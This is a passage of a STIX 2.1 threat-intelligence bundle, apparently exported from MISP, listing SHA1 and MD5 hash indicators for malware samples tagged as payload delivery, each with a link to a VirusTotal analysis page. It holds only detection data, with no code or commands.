"value": "https://www.virustotal.com/file/4a8336797a98e2f74062a477cf88a1c6be603102a3ead70d69823c5d3306536a/analysis/1436693190/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8234-a8a0-49eb-9b81-494602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:24.000Z",
|
|
"modified": "2017-03-29T09:45:24.000Z",
|
|
"description": "- Xchecked via VT: 63aa7d6759523c216de2bc85621f34d2a08f6c3c9dea8f4d3e0d1eae28afecdb",
|
|
"pattern": "[file:hashes.SHA1 = '5e8f8058af9dfb5db7789d5f77925611cf469970']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:24Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8235-298c-4041-80c0-439e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:25.000Z",
|
|
"modified": "2017-03-29T09:45:25.000Z",
|
|
"description": "- Xchecked via VT: 63aa7d6759523c216de2bc85621f34d2a08f6c3c9dea8f4d3e0d1eae28afecdb",
|
|
"pattern": "[file:hashes.MD5 = 'e03f7e5de6d43cd3ac3f3888c745b5cf']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:25Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8236-375c-4a06-abe9-42fc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:26.000Z",
|
|
"modified": "2017-03-29T09:45:26.000Z",
|
|
"first_observed": "2017-03-29T09:45:26Z",
|
|
"last_observed": "2017-03-29T09:45:26Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8236-375c-4a06-abe9-42fc02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8236-375c-4a06-abe9-42fc02de0b81",
|
|
"value": "https://www.virustotal.com/file/63aa7d6759523c216de2bc85621f34d2a08f6c3c9dea8f4d3e0d1eae28afecdb/analysis/1490382537/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8237-ef4c-43fc-bf61-411002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:27.000Z",
|
|
"modified": "2017-03-29T09:45:27.000Z",
|
|
"description": "- Xchecked via VT: 6764806968caeec57f239584098f45eb4cdf1c1610d1a85b5c065bd4a3682fd9",
|
|
"pattern": "[file:hashes.SHA1 = 'c00fc94d650191dd0e905db1372c788306ea32cf']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:27Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8237-bb20-48dd-aa10-46ca02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:27.000Z",
|
|
"modified": "2017-03-29T09:45:27.000Z",
|
|
"description": "- Xchecked via VT: 6764806968caeec57f239584098f45eb4cdf1c1610d1a85b5c065bd4a3682fd9",
|
|
"pattern": "[file:hashes.MD5 = '12372ca69eb4e74407b3177ebdab2fef']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:27Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8238-2c2c-4f19-85e6-406d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:28.000Z",
|
|
"modified": "2017-03-29T09:45:28.000Z",
|
|
"first_observed": "2017-03-29T09:45:28Z",
|
|
"last_observed": "2017-03-29T09:45:28Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8238-2c2c-4f19-85e6-406d02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8238-2c2c-4f19-85e6-406d02de0b81",
|
|
"value": "https://www.virustotal.com/file/6764806968caeec57f239584098f45eb4cdf1c1610d1a85b5c065bd4a3682fd9/analysis/1488281957/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8239-19a0-4d4b-b45f-4cc302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:29.000Z",
|
|
"modified": "2017-03-29T09:45:29.000Z",
|
|
"description": "- Xchecked via VT: e593d990025104eeacc1bf48c3cf02a9f4503b056e6f17806dbc82e66f1878cc",
|
|
"pattern": "[file:hashes.SHA1 = '1ded7f8c675a19a6900f3f641c453d172e9aa995']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:29Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db823a-22cc-4573-8559-4fb502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:30.000Z",
|
|
"modified": "2017-03-29T09:45:30.000Z",
|
|
"description": "- Xchecked via VT: e593d990025104eeacc1bf48c3cf02a9f4503b056e6f17806dbc82e66f1878cc",
|
|
"pattern": "[file:hashes.MD5 = '51f32d97556700bb14931aff90109d32']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:30Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db823b-b57c-4523-8732-45a402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:31.000Z",
|
|
"modified": "2017-03-29T09:45:31.000Z",
|
|
"first_observed": "2017-03-29T09:45:31Z",
|
|
"last_observed": "2017-03-29T09:45:31Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db823b-b57c-4523-8732-45a402de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db823b-b57c-4523-8732-45a402de0b81",
|
|
"value": "https://www.virustotal.com/file/e593d990025104eeacc1bf48c3cf02a9f4503b056e6f17806dbc82e66f1878cc/analysis/1489724346/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db823c-3878-466e-a6aa-4bd202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:32.000Z",
|
|
"modified": "2017-03-29T09:45:32.000Z",
|
|
"description": "- Xchecked via VT: fa56be12aec3eae896d372839d20bb02f45a8f167cfb44ca9b9e517f8bf454c5",
|
|
"pattern": "[file:hashes.SHA1 = '6541c723f9c9c75a06dac0863e02c0568a93c07e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db823d-8f00-4406-84fe-465f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:33.000Z",
|
|
"modified": "2017-03-29T09:45:33.000Z",
|
|
"description": "- Xchecked via VT: fa56be12aec3eae896d372839d20bb02f45a8f167cfb44ca9b9e517f8bf454c5",
|
|
"pattern": "[file:hashes.MD5 = '8e2bd1f992056453d3c57d15edb1d5b0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db823e-ca18-4587-87cb-4a1b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:34.000Z",
|
|
"modified": "2017-03-29T09:45:34.000Z",
|
|
"first_observed": "2017-03-29T09:45:34Z",
|
|
"last_observed": "2017-03-29T09:45:34Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db823e-ca18-4587-87cb-4a1b02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db823e-ca18-4587-87cb-4a1b02de0b81",
|
|
"value": "https://www.virustotal.com/file/fa56be12aec3eae896d372839d20bb02f45a8f167cfb44ca9b9e517f8bf454c5/analysis/1488032597/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db823f-d230-4e13-a93c-4ce902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:35.000Z",
|
|
"modified": "2017-03-29T09:45:35.000Z",
|
|
"description": "- Xchecked via VT: d390f1198f1b0c2307859b523a8fca918994c48cc630bff60f1b1fe159f974cb",
|
|
"pattern": "[file:hashes.SHA1 = '4dd3c66bf1f981adadaf7e931fdbbb9870ce80c3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8240-cc88-4723-a989-417c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:36.000Z",
|
|
"modified": "2017-03-29T09:45:36.000Z",
|
|
"description": "- Xchecked via VT: d390f1198f1b0c2307859b523a8fca918994c48cc630bff60f1b1fe159f974cb",
|
|
"pattern": "[file:hashes.MD5 = 'dd4cde7f99918fbb3083a9367b3d525d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:36Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8241-e914-4b3c-b833-49aa02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:37.000Z",
|
|
"modified": "2017-03-29T09:45:37.000Z",
|
|
"first_observed": "2017-03-29T09:45:37Z",
|
|
"last_observed": "2017-03-29T09:45:37Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8241-e914-4b3c-b833-49aa02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8241-e914-4b3c-b833-49aa02de0b81",
|
|
"value": "https://www.virustotal.com/file/d390f1198f1b0c2307859b523a8fca918994c48cc630bff60f1b1fe159f974cb/analysis/1452169358/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8242-22dc-4440-b347-4d2b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:38.000Z",
|
|
"modified": "2017-03-29T09:45:38.000Z",
|
|
"description": "- Xchecked via VT: 414475578f2d5642be77f2ea18df1f3ea97fc78a5b985944076c41f8b6e3fa54",
|
|
"pattern": "[file:hashes.SHA1 = 'd34d40ec772d92003c9bfabd2f6514a16c024f58']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:38Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8243-a6d0-45fe-9142-4b6a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:39.000Z",
|
|
"modified": "2017-03-29T09:45:39.000Z",
|
|
"description": "- Xchecked via VT: 414475578f2d5642be77f2ea18df1f3ea97fc78a5b985944076c41f8b6e3fa54",
|
|
"pattern": "[file:hashes.MD5 = 'c6e93087fe787a2bfd2dfae48c501d9a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:39Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8244-8468-4cb6-8c2c-4d6502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:40.000Z",
|
|
"modified": "2017-03-29T09:45:40.000Z",
|
|
"first_observed": "2017-03-29T09:45:40Z",
|
|
"last_observed": "2017-03-29T09:45:40Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8244-8468-4cb6-8c2c-4d6502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8244-8468-4cb6-8c2c-4d6502de0b81",
|
|
"value": "https://www.virustotal.com/file/414475578f2d5642be77f2ea18df1f3ea97fc78a5b985944076c41f8b6e3fa54/analysis/1439248096/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8245-e090-4598-bc65-46b402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:41.000Z",
|
|
"modified": "2017-03-29T09:45:41.000Z",
|
|
"description": "- Xchecked via VT: 3eb15bd22b9c70cfaa57a08eccb60de60e6bdaba00489ad0c61139504ec1b274",
|
|
"pattern": "[file:hashes.SHA1 = 'bae07a66df35729457ef7cf544ca818793c155e0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8245-a934-41ad-9a17-481302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:41.000Z",
|
|
"modified": "2017-03-29T09:45:41.000Z",
|
|
"description": "- Xchecked via VT: 3eb15bd22b9c70cfaa57a08eccb60de60e6bdaba00489ad0c61139504ec1b274",
|
|
"pattern": "[file:hashes.MD5 = '40c952e5dd5f4fd3f73dcf4f91c9dded']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8246-4348-4d0c-b493-40c602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:42.000Z",
|
|
"modified": "2017-03-29T09:45:42.000Z",
|
|
"first_observed": "2017-03-29T09:45:42Z",
|
|
"last_observed": "2017-03-29T09:45:42Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8246-4348-4d0c-b493-40c602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8246-4348-4d0c-b493-40c602de0b81",
|
|
"value": "https://www.virustotal.com/file/3eb15bd22b9c70cfaa57a08eccb60de60e6bdaba00489ad0c61139504ec1b274/analysis/1424199874/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8247-be08-4c51-9da2-480f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:43.000Z",
|
|
"modified": "2017-03-29T09:45:43.000Z",
|
|
"description": "- Xchecked via VT: 517db060d4b0d8ae3a22d37f67311d9f5e2bf93d07424a4b9be5fefe84c571e6",
|
|
"pattern": "[file:hashes.SHA1 = 'aae9461dec72a2f5f31dbc11313692d8041beb89']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:43Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8248-d05c-4dfc-a636-4f4f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:44.000Z",
|
|
"modified": "2017-03-29T09:45:44.000Z",
|
|
"description": "- Xchecked via VT: 517db060d4b0d8ae3a22d37f67311d9f5e2bf93d07424a4b9be5fefe84c571e6",
|
|
"pattern": "[file:hashes.MD5 = '8ebc60c9696fd4a3695f9fb568fed0e1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:44Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8249-fb4c-45f7-ad96-4ca802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:45.000Z",
|
|
"modified": "2017-03-29T09:45:45.000Z",
|
|
"first_observed": "2017-03-29T09:45:45Z",
|
|
"last_observed": "2017-03-29T09:45:45Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8249-fb4c-45f7-ad96-4ca802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8249-fb4c-45f7-ad96-4ca802de0b81",
|
|
"value": "https://www.virustotal.com/file/517db060d4b0d8ae3a22d37f67311d9f5e2bf93d07424a4b9be5fefe84c571e6/analysis/1423081448/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db824a-72c0-44fc-bfff-420d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:46.000Z",
|
|
"modified": "2017-03-29T09:45:46.000Z",
|
|
"description": "- Xchecked via VT: 01431670bfa2a14419323ba4731e2b9f03d9bc7362ae78b06792eb605249ff0f",
|
|
"pattern": "[file:hashes.SHA1 = '022543b1a4d05890a729eafcb57b7ce741e8a4ca']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:46Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db824b-b5bc-47b2-89a2-42f302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:47.000Z",
|
|
"modified": "2017-03-29T09:45:47.000Z",
|
|
"description": "- Xchecked via VT: 01431670bfa2a14419323ba4731e2b9f03d9bc7362ae78b06792eb605249ff0f",
|
|
"pattern": "[file:hashes.MD5 = '5d5717c7267e9305f824400b1ebb4378']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:47Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db824c-69c8-4eb5-8d88-401b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:48.000Z",
|
|
"modified": "2017-03-29T09:45:48.000Z",
|
|
"first_observed": "2017-03-29T09:45:48Z",
|
|
"last_observed": "2017-03-29T09:45:48Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db824c-69c8-4eb5-8d88-401b02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db824c-69c8-4eb5-8d88-401b02de0b81",
|
|
"value": "https://www.virustotal.com/file/01431670bfa2a14419323ba4731e2b9f03d9bc7362ae78b06792eb605249ff0f/analysis/1475932565/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db824d-ebb0-4bef-9a4d-4bfd02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:49.000Z",
|
|
"modified": "2017-03-29T09:45:49.000Z",
|
|
"description": "- Xchecked via VT: 21e406638bffc35ad1929c5b03a0bbd42d1a39fb481d1954e0c15135e01e3c6e",
|
|
"pattern": "[file:hashes.SHA1 = 'a9ad91c3d65872d9a96f5ff49569bf4a6cf6873e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:49Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db824e-d4e0-47f9-bc41-44c302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:50.000Z",
|
|
"modified": "2017-03-29T09:45:50.000Z",
|
|
"description": "- Xchecked via VT: 21e406638bffc35ad1929c5b03a0bbd42d1a39fb481d1954e0c15135e01e3c6e",
|
|
"pattern": "[file:hashes.MD5 = 'c8ac5f2d2d7a910e26c34bbea7053063']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:50Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db824f-c200-43ac-8056-4ac502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:51.000Z",
|
|
"modified": "2017-03-29T09:45:51.000Z",
|
|
"first_observed": "2017-03-29T09:45:51Z",
|
|
"last_observed": "2017-03-29T09:45:51Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db824f-c200-43ac-8056-4ac502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db824f-c200-43ac-8056-4ac502de0b81",
|
|
